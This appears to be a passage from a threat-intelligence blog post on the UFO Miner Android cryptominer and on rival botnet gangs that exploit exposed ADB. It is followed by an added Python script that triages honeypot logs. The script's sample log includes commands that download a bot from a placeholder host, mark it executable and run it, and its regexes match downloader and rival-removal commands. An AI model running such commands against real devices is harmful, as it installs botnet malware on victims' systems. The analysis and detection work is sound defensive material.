Comment
Author: Admin | 2025-04-28
Demands. The creator of “UFO Miner” thoughtfully set the throttle at 80%. Unfortunately, the Android Virtual Device we tested on did not obey that throttling command, and ran at full speed for the entire test.

Devices that run at these speeds for an extended period of time can expect to fail at a greater than average rate, and will consume more power, which the victim is forced to subsidize.

We want to believe

UFO Miner is just one of a number of malicious apps that have been picked up by the honeypot, but it has (so far) been the most prolific. It seems that botherder gangs that operate IoT botnets (like Mirai) have slowly been joining the ADB bandwagon. Since the beginning of 2019, we’ve observed a number of different groups attempt to use the same remote-code execution exploits used by UFO Miner to deliver Linux shell scripts to the honeypot.

A competing malware group is playing a game of “capture the flag” with the UFO Miner crowd. The “flag” is your Android device.

These shell scripts profile the processor architecture of the device, and then download a bot, in the form of a Linux ELF application, designed to run on that architecture. These bot gangs appear to be aware of the prolific nature of the UFO Miner app, because the scripts contain shell commands to uninstall UFO Miner, as well as bots delivered by competing botnet gangs.

As Android continues to permeate the IoT market, we expect to see more such attacks targeting the platform.

What
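The script behaviour described above (profile the architecture, download a bot, remove rival malware) can be triaged per session in ADB honeypot logs. The following is an added example, not code from the original article: the log format, addresses, file names, package name and regexes are all constructed assumptions.

```python
import re

# Constructed honeypot log: "<time> <source> <session> <ADB shell command>".
# Addresses are documentation ranges; package and file names are placeholders.
SAMPLE_LOG = """\
2019-02-03T10:15:01Z 198.51.100.7 s1 uname -m
2019-02-03T10:15:02Z 198.51.100.7 s1 pm uninstall com.example.rivalminer
2019-02-03T10:15:03Z 198.51.100.7 s1 cd /data/local/tmp; wget http://203.0.113.9/bot.arm7 -O b; chmod 755 b; ./b
2019-02-03T11:40:10Z 198.51.100.44 s2 getprop ro.product.model
2019-02-03T11:40:12Z 198.51.100.44 s2 pm list packages
2019-02-03T12:05:30Z 198.51.100.90 s3 cat /proc/cpuinfo && curl -s http://203.0.113.9/bot.x86 -o /data/local/tmp/b
"""

# Assumed patterns for each behaviour the article attributes to the scripts.
STAGES = {
    "arch_profile": re.compile(r"\buname\s+-[am]\b|getprop\s+ro\.product\.cpu\.abi|/proc/cpuinfo"),
    "download": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "make_exec": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "evict_rival": re.compile(r"\bpm\s+uninstall\b|\b(?:pkill|killall)\b"),
}

def stages_by_session(log_text):
    """Map session id -> stages seen, in first-seen order."""
    seen = {}
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # skip malformed or empty records
        stages = seen.setdefault(parts[2], [])
        # One logged line often chains several commands.
        for piece in re.split(r";|&&|\|\|", parts[3]):
            for stage, pattern in STAGES.items():
                if stage not in stages and pattern.search(piece):
                    stages.append(stage)
    return seen

def triage(log_text):
    """Label each session by which of the described behaviours it combines."""
    verdicts = {}
    for session, stages in stages_by_session(log_text).items():
        if {"arch_profile", "download"} <= set(stages):
            verdicts[session] = "turf_war" if "evict_rival" in stages else "dropper"
        else:
            verdicts[session] = "partial" if stages else "no_match"
    return verdicts

if __name__ == "__main__":
    for session, verdict in triage(SAMPLE_LOG).items():
        print(session, verdict)
```

A "turf_war" verdict marks sessions that both install a bot and uninstall or kill something else first, which is the competing-gang pattern the article describes.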